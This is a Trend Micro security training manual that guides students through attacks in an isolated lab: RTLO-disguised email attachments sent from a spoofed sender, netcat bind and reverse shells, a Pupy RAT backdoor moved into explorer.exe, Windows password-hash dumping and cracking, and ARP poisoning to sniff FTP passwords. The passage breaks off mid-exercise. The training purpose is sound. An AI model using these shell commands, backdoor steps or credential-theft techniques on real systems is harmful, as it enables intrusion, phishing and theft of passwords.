Cybercrime & Attack Methodologies Workshop Manual v3-2

Advanced Threat Defense
Cybercrime Operations & Attack

Methodologies
Workshop Manual
Copyright © 2019 Trend Micro Incorporated. All rights reserved.
Trend Micro, the Trend Micro t-ball logo, InterScan, VirusWall, ScanMail, ServerProtect, and TrendLabs
are trademarks or registered trademarks of Trend Micro Incorporated. All other product or company
names may be trademarks or registered trademarks of their owners.
Portions of this manual have been reprinted with permission from other Trend Micro documents. The
names of companies, products, people, characters, and/or data mentioned herein are fictitious and are
in no way intended to represent any real individual, company, product, or event, unless otherwise noted.
Information in this document is subject to change without notice.
No part of this publication may be reproduced, photocopied, stored in a retrieval system, or transmitted
without the express prior written consent of Trend Micro Incorporated.
Author: ATD Taskforce
Released: December 19, 2019

Version: 1.1
Table of Contents
Table of Contents
Introduction.................................................................................................. 5
About this Book .................................................................................................................... 7
Laboratory Introduction ....................................................................................................... 7
Trend Micro Training Cloud Access ...................................................................................... 7
Virtual Environment ............................................................................................................. 9
User Credentials .............................................................................................................9
Accessing the Virtual Machines ...................................................................................................10
Point of Entry .................................................................................................... 13

Exercise 1: Spoof-Email with malicious Attachment ......................................................................... 15
Command & Control ..........................................................................................23

Exercise 2: TCP Bind Shell ................................................................................................25
Exercise 3: TCP Reverse Shell ......................................................................................... 27
Exercise 4: Remote Access Tool Pupy ..............................................................................28
Lateral Movement ............................................................................................. 35

Exercise 5: View LM and NTLM Password Hashes ................................................................ 37
Exercise 6: Extract Passwords from Hash Dump .................................................................. 42
Exercise 7: ARP Poisoning to sniff FTP traffic ........................................................................46
Exercise 8: Fileless Backdoor with Powershell Empire ......................................................... 53
Exercise 9: Privilege Escalation ........................................................................................ 59
Exercise 10: ARP Poisoning to sniff HTTP(s) traffic ............................................................... 67
Exercise 11: Remote Execution with PsExec ................................................................................72
Exercise 12: Remote Execution with AT ............................................................................... 78
Exercise 13: Remote Execution with WMIC ..................................................................................81
Exercise 14: Remote Port Forwarding and RDP .....................................................................84
Exercise 15: Pass-The-Hash .................................................................................................... 88
Exercise 16: Kerberos Golden Ticket Attack ..........................................................................94
Final Challenge ..............................................................................................99

Lab 1: Perform an APT Attack ........................................................................................................... 101
Appendix A: Optional Activities ........................................................................ 105

A.1 DNS Tunneling....................................................................................................................... 107
Appendix B: Commands & Parameters ................................................................... 113

Netcat .......................................................................................................................................... 115
© 2019 Trend Micro Inc. Confidential - Release Pursuant to NDA - Confidential 3

Advanced Threat Defense - Cybercrime Operations & Attack Methodologies
Pupy ............................................................................................................................................ 115

net............................................................................................................................................... 116
gsecdump ................................................................................................................................... 116
samdump2 .................................................................................................................................. 117
John-The-Ripper ......................................................................................................................... 117
Powershell Empire ............................................................................................................... 118
PsExec .................................................................................................................................. 118
at................................................................................................................................................. 119
schtasks ..................................................................................................................................... 119
wmic ........................................................................................................................................... 119
netsh .................................................................................................................................... 120
wce....................................................................................................................................... 120
mimikatz .................................................................................................................................... 121
dnscat2 ...................................................................................................................................... 121
Appendix C: Table of Contents ......................................................................... 123
4 © 2019 Trend Micro Inc. Confidential - Release Pursuant to NDA - Confidential

Chapter 1: Introduction
Introduction
This chapter gives information about the following items:
• Lab introduction
• Training environment
• Lab Setup
• Credentials
• Accessing the Virtual Machines
It also contains information about all pre-requisites, if required.


Chapter 1: Introduction
About this Book

This Workshop Manual accompanies the course Advanced Threat Defense: Cybercrime Operations
& Attack Methodologies.
It only contains the instructions for all exercises and labs discussed throughout this part of the
Advanced Threat Defense course.
Laboratory Introduction
This workshop manual refers to a pre-configured environment which is provided by Certified Trainers
during the course.
As the environment is hosted on the Trend Micro Training Cloud, a host computer with an active
internet connection is required for access.
Ensure to read all information carefully in this chapter, as it outlines how to access and use the
environment.
Trend Micro Training Cloud Access

As this training makes use of different tools which might compromise security of live systems, the
virtual machines will have no access to any resources outside of the vApp itself.
In order to access the vApp assigned by the Certified Trainer, follow the guidelines below:
1. Open an invitation email sent from noreply-productcloud@trendmicro.com
2. Click the link in an invitation email.
Invitation email : example

3. On the “Training Area” page, click[Enter Training] icon.
TREND MICRO TRAINING CLOUD ACCESS: LIST OF all Trainings
4. Make sure that the status is [Powered On]. Then, click [Enter Lab View] icon.
If the status is [Powered Off], tick the checkbox □ on the left and click ▶icon.
5. Make sure that the [Lab View] window appears.
TREND MICRO TRAINING CLOUD ACCESS: Lab View

Introduction
Virtual Environment
The virtual environment contains 4 virtual machines:
CLASS SETUP: VIRTUAL ENVIRONMENT
The following table lists additional information about the virtual machines:
Virtual Machine Description

Server Server 2003; used for SMTP, HTTPS and other server functions
Victim Windows 7 endpoint, used as a Victim for the attack exercises
Attacker Windows 7 endpoint, used to perform attacks such as sniffing
Ubuntu18 Ubuntu 18 endpoint, used for different attacks such as PupyShell
CLASS SETUP: VIRTUAL MACHINE DESCRIPTIONS
Note: You will notice, that not all of the virtual machines used during this part of the Advanced
Threat Defense course are running the latest available Operating Systems. As attacks most
likely use similar methodologies, such as sniffing network traffic, using older Operating
Systems will not affect the learning outcome of this course.
User Credentials
The following credentials should be used to log in to each virtual machine:
Virtual Machine / Account Username Password

Server Administrator P@ssw0rd
Victim ACE202\Victim N0virus1
Attacker ACE202\Attacker N0virus1
Ubuntu18 ubuntu novirus=123
SMB SMBUser SMBPass
FTP FtpUser FtpPass
CLASS SETUP: USER CREDENTIALS

Accessing the Virtual Machines
Note: The screenshots in this section are indicative only; some attributes, such as name, will
depend on the vApp currently assigned to your student account.
1. On [Lab View] window, make sure the [Status] column for all the virtual machines indicates
Powered On
ACCESSING THE VIRTUAL MACHINES: OPEN THE VAPP
2. Select a virtual machine you would like to access and click [Remote Control] icon.
ACCESSING THE VIRTUAL MACHINES: “Remote Control” Icon

Introduction
3. The screen like below appears after [Remote Control] icon is clicked.
4. Logon screen will appear several seconds after above screen appears.


Chapter 1: Point of Entry
Point of Entry
This chapter demonstrates an example for the 2nd stage of a typical APT, Point of Entry:
• Sending a spoofed email using a malicious attachment


Point of Entry
Exercise 1: Spoof-Email with malicious Attachment

In this exercise, we will be sending a spoofed or fake email that appears valid. This email contains a
malicious attachment that hides behind a harmless file extension that is made possible through the
use of Right-to-Left Override (RTLO.)
> Preparing the Malicious Attachment

1. Access the Training Cloud environment.
See: Introduction > Trend Micro Training Cloud Access on page 7 for details.
2. Open the console window of Attacker.
3. Log in using user Attacker (default password: N0virus1).
See: Introduction > User Credentials on page 9 for details.
4. Open Notepad through Start > All Programs > Accessories
5. Type in the following and press <Enter> to go to the next line:
demo.screenshot.jpg
6. On the second line, type the following:
gpj.tohsneedemo.scr
7. Place the cursor at the very left of the second line, before the letter g:
PREPARING EMAIL: PREPARING RTLO
8. Right-click the cursor and select Insert Unicode control character > RLO Start of right-to-
left override:
PREPARING EMAIL: PLACING RTLO CHARACTER

9. The text flips horizontally, forming the word rcs.omedeenshot.jpg:
PREPARING EMAIL: TEXT CHANGES WITH RTLO APPLIED
10. Place the cursor between rcs.omed and eenshot.jpg:
PREPARING EMAIL: SET LOCATION FOR LTRO CHARACTER
11. Right-click and select Insert Unicode control character > LRO Start of left-to-right
override.
12. The first half of the text, rcs.omed, flips horizontally again, this time forming
demo.screenshot.jpg:
PREPARING EMAIL: TEXT CHANGES WITH LTRO APPLIED
Using Unicode control characters, we are able to manipulate Windows into displaying the
potentially harmful and executable SCR file as a harmless JPG file.
13. Copy the modified text (second line) to the clipboard.
Copying the text may be tricky as the cursor will move backwards (right to left) from “g” to
“e” of “eenshot.jpg”. Double-click on the line will help selecting the whole line.
The actual file name will not be changed; however, the controls we have inserted simply
dictate the direction of the letters so that Windows will know how to present them to the
user.
14. Open Windows Explorer.
15. Navigate to “C:\Tools”.
16. Right-click on “payload.exe” and select Rename.

Point of Entry
17. Select all of the existing text, including the file extension.
Paste the modified text as the new name for the file, making sure the old “.exe” extension is
removed in the process.
When prompted about the new file extension, click on “Yes”:
PREPARING EMAIL: RENAME PAYLOAD.EXE
18. The file will be renamed to gpj.tohsneedemo.scr, but it will be displayed as

demo.screenshot.jpg:
PREPARING EMAIL: FILE RENAMED
19. As the unicode control characters do not affect some views of Windows Explorer, make sure
that you set the view to List or Details:
PREPARING EMAIL: CHANGE VIEW OF WINDOWS EXPLORER

> Send a spoofed Email

1. Still on the Attacker machine, open Mozilla Thunderbird. Enter the password for the Attacker
account when prompted.
2. On the Mozilla Thunderbird window, click the account of Attacker in the left pane.
SENDING EMAIL: ACCOUNT SELECTION
3. On the Accounts section, select View settings for this account:
SENDING EMAIL: VIEWING ACCOUNT SETTINGS
4. Click Outgoing Server (SMTP):
SENDING EMAIL: OUTGOING MAIL SERVER SETTINGS
5. Click “Edit” and set the Authentication method to “No Authentication”:
SENDING EMAIL: CONFIRM SMTP SETTINGS
Note: For testing purposes, Security and Authentication options are not enforced in this
environment.

Point of Entry
6. Click “OK”.
7. On the Account Settings, click the Attacker mailbox at the top of the list and select Manage
Identities > Add.
8. Specify boss@your.company.com as email address and click “OK”.
SENDING EMAIL: SPOOFING EMAIL SENDER
Ensure that the Outgoing Server (SMTP) is the correct one, as seen in step 5.
9. Close all pop ups and start composing a new email by click on “Write”.
Specify the following details:
From: boss@your.company.com
To: Victim@ACE202.TrendMicro
Subject: Demo Screenshot
Body:
Please check the attached screenshot.
Regards,
Boss
10. Click “Attach” and attach the modified demo.screenshot.jpg from the “Tools” folder.
SENDING EMAIL: ATTACHING MALICIOUS FILE
Note that the real filename of the attachment will still be displayed by the email client.
11. Click on “Send”.

12. Switch to the Victim machine to check the email we have sent.
13. Open Mozilla Thunderbird. Enter the password for the Victim account when prompted.
14. Mozilla Thunderbird automatically sends and receives emails on launch.
If it does not retrieve messages automatically, click the “Get Mail” button. Our test email we
have sent from the Attacker machine should appear in the Inbox:
SENDING EMAIL: MALICIOUS EMAIL RECEIVED
15. Save the attachment of the email to the “Downloads” folder.
SENDING EMAIL: SAVING ATTACHMENT
16. Open a command prompt and navigate to the user's temp folder:
cd %temp%
17. List the content of the user's temp folder using the command:
dir
Take note of the files inside the folder.

18. Since we have not run the downloaded attachment yet, there should not be anything
suspicious in the user’s temp folder:
SENDING EMAIL: CONFIRMATION OF NO MALICIOUS FILES IN %TMP%

Point of Entry
19. Open Windows Explorer and navigate to the “Downloads” folder.

20. Double-click the demo.screenshot.jpg file:
SENDING EMAIL: OPEN MALICIOUS FILE
A normal image will open in the Windows Photo Preview application. This is the normal
behavior expected by the user. However, behind the scenes, the user is not aware that the
executable malware we have sent is also capable of doing other things, including dropping a
malicious payload.
21. Go back to the command prompt and display the contents of the user's temp folder again:
dir
This time, a Successful_Attack.txt file is listed. This is the payload of our executable file,
which proves our attack was successful. In real attack scenarios, this could be another
malicious executable rather than a “.txt” file.


Chapter 2: Command & Control
Command & Control

Referring to the 3rd stage of a typical APT attack, this chapter details the following
attack methodologies:
• TCP Bind & TCP Reverse Shell
• Remote Access Tools


Command & Control
Exercise 2: TCP Bind Shell

Bind shell is a type of shell, in which a Attacker establishes a connection towards the Victim machine.
1. Open the console window of Victim.
2. Click on Start > Run and type cmd to open a command prompt.
3. On the command prompt, type the following command to setup the Netcat for bind shell.
nc -lvp 4444 -e cmd.exe
Netcat (nc) has been added to “c:\windows\system32”, so we can run the application from
anywhere in the command line.
Note: Refer to the Appendix B.1 on page 113 for additional information on Netcat parameters.
4. This will start Netcat, which will listen on port 4444 and pass on cmd.exe to the remote host once
a connection is established:
TCP BIND SHELL: START NETCAT
Note: At this stage, anyone who connects to the Victim machine on port 4444 will be able to
receive shell access on the target.
5. Switch to Attacker machine.

6. Launch a command prompt and run the following command to connect to the Victim’s IP address
and port:
nc -nv 192.168.100.121 4444
As mentioned above, this command will give us shell access to the Victim machine.
7. Type the following command:
ipconfig

8. As a result, the IP configuration of the Victim machine should be displayed, as we’re running the
command directly on a command prompt on the Victim machine:
TCP BIND SHELL: ESTABLISHED CONNECTION WITH CMD PASSED THROUGH
9. Close the command prompt on both, the Attacker and the Victim machine.

Command & Control
Exercise 3: TCP Reverse Shell

In this exercise, we will demonstrate Reverse shell using Netcat. With Reverse shell, as opposed to
Bind shell, a victim machine sends a command shell to a listening host.
1. Open the console window of the Attacker machine.
2. Open command prompt and use the following command to setup Netcat to listen for an incoming
shell:
nc -lvp 4444
3. Switch to the Victim machine.

4. Launch a command prompt window and establish a communication with the Attacker machine
using the command:
nc -nv 192.168.100.111 4444 -e cmd.exe
5. This command establishes communication with the Attacker machine on port 4444 and passes
on cmd.exe to the Attacker:
REVERSE SHELL: COMMUNICATION ESTABLISHED
6. Switch to the Attacker machine.

7. Notice that the communication has been successfully established, and the Victim’s command
prompt has been started. Run the command:
ipconfig
8. We can see that “ipconfig” displays Victim's IP address from the Attacker's command prompt:
REVERSE SHELL: SUCCESSFUL COMMAND EXECUTION ON VICTIM
9. Close the command prompt window on both, the Attacker and Victim machines.

Exercise 4: Remote Access Tool Pupy

In this exercise, we will be using a RAT (Remote Access Tool) called “Pupy” to control a Victim
machine.
Pupy is an open-source, cross-platform, multi function RAT and post-exploitation tool mainly written
in python. Pupy can reflectively migrate into other processes.
1. Login to the Ubuntu machine. (default user: ubuntu, password: novirus=123)
2. Right-click on the Desktop and select Open Terminal.
3. Navigate to the directory of Pupy:
cd pupy/pupy
Note: As commands in Linux operating systems, such as Ubuntu, are case-sensitive, ensure to type
all commands with proper case as shown in this manual.
Refer to Appendix B.2 on page 113 for references on the Pupy command set.
4. Type the following command to create “backdoor.exe”, which will be used as a remote client
capable of connecting back to the Ubuntu machine:
sudo ./pupygen.py -A x64 -f client -o /home/ubuntu/winshare/backdoor.exe connect --host

192.168.100.151
Enter the password of ubuntu again once requested.

5. Once the command is executed, it will start building the “backdoor.exe”:
PUPY RAT: CREATE BACKDOOR.EXE
6. In order to receive any communication from a client running the “backdoor.exe”, we will need to
create a listener, waiting for incoming connections. Run the following command:
sudo ./pupysh.py

Command & Control
7. This will start the Pupy shell:
PUPY RAT: SHELL STARTED, AWAITING INCOMING CONNECTIONS
Once “backdoor.exe” is executed on a Victim machine, it will establish a shell session back to the
Pupy shell.
8. Switch to Victim machine.
9. Select Start > Run and type the following command to connect to a SMB share, where the
“backdoor.exe” is stored:
\\192.168.100.151\winshare
10. From the “winshare” folder, copy the backdoor.exe to the desktop of the Victim machine.
11. Close or minimize the Windows Explorer window.
12. Execute the backdoor.exe.
13. You will notice, that there is no graphical interface for the backdoor.exe. To confirm it is running,
right-click anywhere on the taskbar and select Start Task Manager.
14. In the Task Manager window, click on the tab “Processes”.
15. The backdoor.exe will be listed as running:
PUPY RAT: TASK MANAGER SHOWS BACKDOOR.EXE RUNNING
16. Switch to the Ubuntu machine.

17. In the Pupy shell window you can see the “Session 1 opened...”, displaying the IP address of the
Victim.
This proves the connection between Ubuntu and Victim machine has been established
successfully:
PUPY RAT: PUPY SHELL HAS RECEIVED COMMUNICATION
18. To see the list of available commands, type the command:
help
19. Type the following command to get more info about the current session:
info
20. This will display different items, such as the registered user name and host name belonging to
the Victim machine:
PUPY RAT: INFO OUTPUT
21. Try to get shell access (command prompt) to the Victim machine with the command:
shell
This will launch the command prompt from the Victim machine:
PUPY RAT: SHELL ACCESS
22. Confirm this is the command prompt of the Victim machine with the command:
hostname
This will display the host name of PC-Victim.

Command & Control
23. Type the command:
ipconfig
This command shows the IP configuration of the Victim machine. Both commands prove, we have
currently shell access on the target machine.
24. Leave the command prompt of the Victim using the command:
exit
The connection with the Victim machine stays open, the “exit” command only closes the remote
command prompt.
25. Open notepad.exe on the Victim using exec command:
exec notepad.exe
As notepad.exe is a graphical tool, there will be no output to display on the terminal.

26. To confirm Notepad has been launched, switch to the Victim machine.
27. Notepad should have been executed successfully. Close Notepad.
28. For the next step of migrating the process into a system process, confirm that backdoor.exe is
still running on the Victim machine using the Task Manager.
29. Switch back to the Ubuntu machine.
30. To migrate the backdoor.exe process to a different process, explorer.exe, run the following
command:
migrate -p explorer.exe
When done properly, this allows to hide malicious processes within “normal” processes.
31. Once the process is migrated into explorer.exe, we can see that another session has opened while
the original session was automatically closed:
PUPY RAT: MIGRATION SUCCESSFUL, NEW SESSION CREATED
This is normal behavior, as the process itself has been changed and the communication needed
to be re-established.

33. In Task Manager, “backdoor.exe” should no longer be listed:
PUPY RAT: BACKDOOR.EXE NOT SHOWN IN TASK MANAGER
34. In Task Manager, click View > Select Columns.

35. Tick the box for PID:
PUPY RAT: TASK MANAGER COLUMN SELECTION
36. Click “OK”.

37. Take note of the value of PID for “explorer.exe”, as the Process ID will be different for each
machine:
PUPY RAT: EXPLORER.EXE PID

39. Get the process ID of the current session using the command:
getpid
40. The output should be the same as the PID shown on the Task Manager in step 38:
PUPY RAT: PID OF CURRENT SESSION
We have now confirmed that we have successfully migrated “backdoor.exe” into the explorer.exe
process, making the application not obviously visible.
41. Get the Session ID by typing the command:
sessions

Command & Control
42. Kill the session using the Session ID received in step 41 - in our example the Session ID is “1”:
sessions -k 1
43. Close the terminal.


Chapter 3: Lateral Movement
Lateral Movement
This chapter, supporting the 4th stage of a typical APT attack, demonstrates
the following methodologies:
• Retrieving Password Hashes: LM & NTLM
• Cracking Password Hashes
• Performing ARP Poisoning
• Fileless Attacks
• Privilege Escalation
• Other infiltration possibilities: psexec, at, wmic
• Remote Port Forwarding
• Authentication using Pass-the-Hash
• Kerberos Golden Ticket Attack


Lateral Movement
Exercise 5: View LM and NTLM Password Hashes

In this exercise, we will be inspecting the hashes of a user account's password. This exercise has its
focus on understanding the basics of LM and NTLM hashes.
> Hashes on Windows 2003: gsecdump

1. Access the Server machine.
In case you receive a warning about a failed service, discard the message with click on “OK”.
2. Open a command prompt.
3. On the command prompt, navigate to the Tools folder:
cd \tools
4. Create a new user account named test, with no password:
net user test /add
If the command is executed properly, the message "The command completed successfully."
will appear.
Note: Refer to Appendix B.3 on page 114 for more information about the net command.
5. View the hashes of the newly created account test using gsecdump-v2b5.exe:
gsecdump-v2b5.exe -s | findstr /c:"test"
Note: Refer to Appendix B.4 on page 114 for more information of gsecdump parameters.
6. Since we did not set a password for this account, the hashes for the test account appear as:
aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
7. View the hashes of the built-in Guest account using the command:
gsecdump-v2b5.exe -s | findstr /c:"Guest"
8. Take note of the LM and NTLM hashes for the Guest account, which does not require a
password to log in. They are exactly the same as the ones from the newly created test
account:
LM & NTLM HASHES: HASHES OF EMPTY PASSWORDS

9. Set “Trend” as the password for the test account:
net user test Trend
10. View the hashes of the test account again, to confirm the changes:
11. Compare the previous password hashes with the new ones. Both the LM and the NTLM
hashes should have been updated with the following:
8dc75c53a8482736aad3b435b51404ee:0c9743903053f0ccf71fd4938d2c3569
At first glance, the hashes are completely different; however, upon looking closely, the
second 16 characters of the LM hash have the value "aad3b435b51404ee" which is also
similar to the second 16 characters of the blank password.
12. Change the password of the test account to an all-capital "TREND”:
net user test TREND
13. View the updated hashes again:
14. Compare the hash of the passwords "Trend" with the all-capital "TREND". You will notice that
the NTLM hash changed but the LM hash remained the same. This shows that the LM hash is
not case-sensitive:
LM & NTLM HASHES: LM HASH CASE-INSENSITIVE
15. Change the password of the test account to use the 14-character password
"_Trend Trend_":
net user test _Trend Trend_
Ensure to type two underscore (_) symbols in between "Trend".

16. View the hashes of the test account:

Lateral Movement
17. The LM hash has a 14-character restriction and Windows calculates the LM hash by dividing
the password into two 7-character sets. In this example, the password "_Trend Trend_" is
divided into "_Trend_" and another "_Trend_". By looking at the LM hash, you will notice that
the hash for the 7 characters repeats:
LM & NTLM HASHES: LM HASH 7 CHARACTER SPLIT
The hash for "_Trend_" is "1a01f628ff51c0eb", so the hash for "_Trend Trend_" becomes
"1a01f628ff51c0eb1a01f628ff51c0eb"
18. Change the password of the test account to "_Trend Trend_ABCDEFGH":
net user test _Trend Trend_ABCDEFGH
This new password has more than 14 characters which exceeds the LM hash limit.
19. View the hashes of the test account again:
20. The LM hash will look familiar, as it is just the same as the LM hash of a blank password. This
means, when a password exceeds the 14-character limit, the NTLM hash will be calculated but
the LM hash will have no value:
LM & NTLM HASHES: LM HASH 14 CHARACTER LIMITATION
21. Delete the test account for the next activity:
net user test /delete

> Hashes on Windows 7: samdump2

1. Access the Attacker machine.
2. Click on Start and type cmd.
3. Right-click cmd.exe and select Run as Administrator to open an elevated command prompt.
4. Navigate to the “samdump2” folder inside the Tools directory:
cd \tools\samdump2
5. Create a new user account named test with "Trend" as its password:
net user test Trend /add
6. View the hashes of the test account using samdump2.exe:
samdump2.exe -l | findstr /c:"test"
Note: Refer to Appendix B.5 on page 115 for more information about samdump2 parameters.
7. The LM and the NTLM hashes should have the following values:
aad3b435b51404eeaad3b435b51404ee:0c9743903053f0ccf71fd4938d2c3569
8. If you remember from the previous activity, if the password is set to "Trend", the hashes
change to this value:
8dc75c53a8482736aad3b435b51404ee:0c9743903053f0ccf71fd4938d2c3569
Comparing these two results, we can see that the NTLM hashes are the same but the LM
hashes are not. The LM hash in this exercise has the same value as that of a blank password.
This is due to a local security policy in Windows 7, which is enabled by default.
9. To change this security policy, click on Start and type secpol.msc. This will open the Local
Security Policy Management Console.
10. Expand Security Settings > Local Policies > Security Options in the left panel:
LM & NTLM HASHES: LOCAL SECURITY POLICY MANAGEMENT

Lateral Movement
11. Double-click on Network security: Do not store LAN Manager hash value on the next
password change in the list of settings.
12. You will see, this policy is enabled by default. This causes the LM hash to appear as that of a
blank password:
LM & NTLM HASHES: SECURITY POLICY ON WINDOWS 7 PREVENTING LM HASH BEING STORED
13. Switch back to the Server machine.

14. Open the Local Security Policy Management Console using the command secpol.msc.
15. Expand Security Settings > Local Policies > Security Options.
16. Double-click on Network security: Do not store LAN Manager hash value on the next
password change in the list of settings.
On Windows 2003, this policy is disabled by default. Because this policy is not enabled, we
were able to view the LM hash on our previous activities.
Note: Do not enable this policy on the Windows 2003 server, as this otherwise will cause follow
up exercises to fail.
17. Switch back to the Attacker machine.

18. Delete the test account:
net user test /delete

Exercise 6: Extract Passwords from Hash Dump

In this exercise, we will be using Rainbow Table and Brute Force techniques to extract the passwords
from a local hash dump.
> Creating User Credentials and dump the Hashes

2. Open a command prompt.
3. Navigate to the “Tools” folder if you are not there yet:
cd \tools
4. Type in the following commands to create 7 accounts with different passwords:
net user test1 Trend /add

net user test2 TREND /add
net user test3 _Trend Trend_ /add
net user test4 _Trend Trend_ABCDEFGH /add
net user test5 ACE202 /add
net user test6 @Trend /add
net user test7 Trend. /add
You will receive a warning for user test4, as the password exceeds the 14 characters. Press
<Y> to create the user.
5. Dump the hashes of all user accounts into a text file named hashes.txt:
gsecdump-v2b5.exe -s | findstr /C:"test" > hashes.txt

7. Open an elevated command prompt if it is no longer open.
8. Navigate to the “samdump2” folder:
cd \tools\samdump2
9. On the command prompt, type in the following commands to create 3 accounts with different
passwords:
net user test1 12345678 /add

net user test2 trend /add
net user test3 ACE202 /add
10. Dump the hashes of all user accounts into a text file named hashes.txt:
samdump2.exe -l | findstr /C:"test" > hashes.txt

Lateral Movement
> Rainbow Tables: ophcrack

1. Switch to the Server machine.
2. Open Windows Explorer and navigate to “C:\Tools”.
3. Double-click on ophcrack-win32-installer-3.6.0.exe. This will start the installation of
ophcrack.
4. On the Welcome screen, click on “Next”.
5. Within the Select components to install section, make sure to uncheck "Download and
Install small WinXP tables (380MB)":
OPHCRACK: SELECT COMPONENTS TO INSTALL
6. Leave all other options as per default and click “Next” three times to start the installation.
The installation process begins. This may take a few minutes to complete.
7. Click “Next” when the installation is complete, followed by “Finish” to close the Setup Wizard.
8. Double-click the ophcrack shortcut on the desktop.
9. Click “Load” from the menu and select PWDUMP file.
10. In the Open PWDUMP File pop up, select C:\Tools\hashes.txt and click “Open”:
OPHCRACK: SELECT PWDUMP FILE
11. Click the “Tables” icon on the menu.

12. In the Tables pop up, click on the Install button. The "Browse For Folder" window will appear.
13. Select the folder C:\Tools\tables_xp_free_fast and click “OK”.
14. Click “OK” again to go back to the main window. The table XP free fast should be listed in
the bottom panel:
OPHCRACK: REGISTRATION OF XP FREE FAST TABLE
Note that ophcrack splits and displays the LM password in 2 different columns, “LM Pwd 1”
and “LM Pwd 2”.
15. Click on the “Crack” button to start retrieving the passwords from the hashes.
16. Click on the plus + sign next to XP free fast on the table list.
This will provide the progress for the current password retrieval.
You will notice that the LM PWD 1, LM PWD 2, and NT Pwd columns are slowly being
populated with the passwords you have provided at the start of the exercise.
Certain user accounts’ password will be shown as "not found" due to different reasons:
User Account Password Reason

Test3 _Trend Trend_ _ sign, Rainbow table has no support
Test4 _Trend Trend_ABCDEFG Exceeding the 14 character limit
Test6 @Trend @ sign, Rainbow table has no support
Test7 Trend. . sign, Rainbow table has no support
OPHCRACK: ACCOUNTS WITH PASSWORDS “NOT FOUND”

Lateral Movement
> Brute Force: John-the-Ripper

2. Open an elevated command prompt, in case it is no longer open.
3. Navigate to the folder “C:\tools\john179j5\run” folder:
cd \tools\john179j5\run
4. Use the John the Ripper tool to crack the password from the hashes using the brute force
technique:
john --format=nt c:\tools\samdump2\hashes.txt
Note: Refer to Appendix B.6 on page 115 for further information on john parameters.
5. This process may take some time to complete because of the complexity of one of the
passwords we have set. Within just a few seconds however, we should see the results for the
first two passwords.
Pressing any key will list the current password that John the Ripper is trying to crack.
JOHN-THE-RIPPER: BRUTE FORCE
6. Once the tool has finished with the first two hashes, abort the process by pressing
<CTRL>+<C>.
7. Three new files, namely john.pot, john.rec and john.log, have been created. View the contents
of the john.pot file for the list of the passwords acquired through brute force:
type john.pot
8. The file contains successfully cracked passwords with their respective NTLM hashes:
JOHN-THE-RIPPER: JOHN.POT STORES SUCCESSFULLY CRACKED PASSWORDS

Exercise 7: ARP Poisoning to sniff FTP traffic

In this exercise, we will be using ARP Spoofing to intercept data packets intended for other
computers. In the process, we will be capturing clear-text passwords sent via FTP within the
compromised network.
> Installation of Cain & Abel

1. On the Attacker machine, use Windows Explorer to navigate to “C:\Tools”.
2. Double-click ca_setup.exe.
When the User Account Control dialogue box appears, click on “Yes”.
3. As we will be using the default installation settings for Cain & Abel, simply click “Next” on
each page of the installer.
4. Click “Finish”.
5. Once Cain & Abel is installed, you will be prompted to install WinPcap. Click “Install”:
CAIN & ABEL INSTALLATION: WINPCAP
We do not need to change any settings for WinPcap, therefore install it with all default
options.
6. Ensure to leave Automatically start the WinPcap driver at boot time selected and click
“Install”:
CAIN & ABEL INSTALLATION: SETUP WINPCAP DRIVER AT BOOT
7. Click on “Finish” to close the setup wizard.

Lateral Movement
> Confirm ARP Cache before Poisoning

2. Open the Control Panel and select Windows Firewall.
3. Ensure Domain networks is listed as “Connected” and Windows Firewall state is "On."
If it is not the case, check if the Server machine is running and restart the Victim machine.
ARP CACHE: DOMAIN NETWORK “CONNECTED”
4. Open a command prompt and run the following command to query the ARP cache:
arp -a
5. This will list all cached MAC <> IP address mappings.

Since this is the first time we have opened up the Victim machine, there will be no ARP
entries for the Attacker machine (192.168.100.111) yet:
ARP CACHE: ATTACKER NOT LISTED YET
6. In the command prompt, ping the Attacker machine:
ping 192.168.100.111
7. Re-run the command to display the ARP cache:
arp -a

8. The MAC addresses of all machines, Attacker (192.168.100.111), Server (192.168.100.131) and
Ubuntu (192.168.100.151), are now in the list, marked as “dynamic”:
ARP CACHE: ATTACKER IS LISTED ONCE PINGED
Take also note that the MAC address of each machine is unique.
> ARP Poisoning with Cain & Abel

2. Double-click the Cain shortcut on the Desktop.
In case you receive a warning regarding the Windows Firewall, ensure you have disabled the
firewall before proceeding. See: Exercise 7.2.
3. Click on the Start/Stop Sniffer icon (the 2nd from the left) to enable the Sniffer.
ARP POISONING: CAIN & ABEL ENABLE SNIFFER
4. Click on the Sniffer tab.
ARP POISONING: SNIFFER TAB
5. In case the list contains already entries from a previous install, right-click an entry and select
Remove All.
6. Right-click on an empty space on the table and select Scan MAC Address:
ARP POISONING: SCANNING MAC ADDRESSES

Lateral Movement
7. In the Mac Address Scanner pop up, ensure to select All hosts in my subnet:
ARP POISONING: SCANNING ALL HOSTS
8. Click “OK” to begin the scan.

9. Once finished, you will see the IP and MAC addresses of the Server, the Victim and the
Ubuntu machines listed:
ARP POISONING: SCAN RESULTS
10. Write down in the table below, the corresponding MAC addresses of each IP addresses after
the tool scanned for MAC addresses:
IP Address MAC Address
192.168.100.121 005056014F61
192.168.100.131 005056014F63
192.168.100.151 0050560156B9
MAC AND IP ADDRESS MAPPING
11. Click on the APR tab at the bottom to configure ARP poisoning routing.
ARP POISONING: APR TAB

12. Click on an empty slot on the table at the top to enable the Add to List button:
ARP POISONING: ADD TO LIST
13. Click on the Add to List icon.

14. Within the pop up, select the IP address of the Victim machine, 192.168.100.121, on the left
panel. Any remaining IP addresses will automatically be listed on the table on the right:
ARP POISONING: SELECTING THE TARGETS
15. Select the IP address of the Server, 192.168.0.131, on the right panel and click “OK”.
Note: It does not matter, which machine is selected first on the left. ARP poisoning will cause
both targets to update their ARP cache of the opposite side’s MAC address to the MAC
address of the Attacker.
16. A new entry will be listed in the main window of Cain, showing the status “Idle”:
ARP POISONING: TARGETS LISTED

Lateral Movement
17. Click on the Start/Stop APR icon to begin ARP Poisoning:
ARP POISONING: START POISONING
You will notice, the status of the selected targets in the list will change from “Idle” to
“Poisoning”.
18. Switch back to the Victim machine.
19. Using a command prompt, check the ARP cache again:
arp -a
The ARP cache now shows the Server machine, 192.168.100.131, having the same MAC
address as the Attacker machine.
20. Connect to the FTP server hosted at the Server machine using the command:
ftp 192.168.100.131
21. Login with the credentials FtpUser with password FtpPass.

22. End the FTP session with the command:
quit

24. Click on the Passwords tab at the bottom of Cain & Abel's console window:
ARP POISONING: PASSWORDS TAB

25. Select Passwords > FTP on the left panel:
.exe
ARP POISONING: DISPLAYING PASSWORDS
Notice that FTP has a value of (1). This means the Cain program was able to sniff one (1)
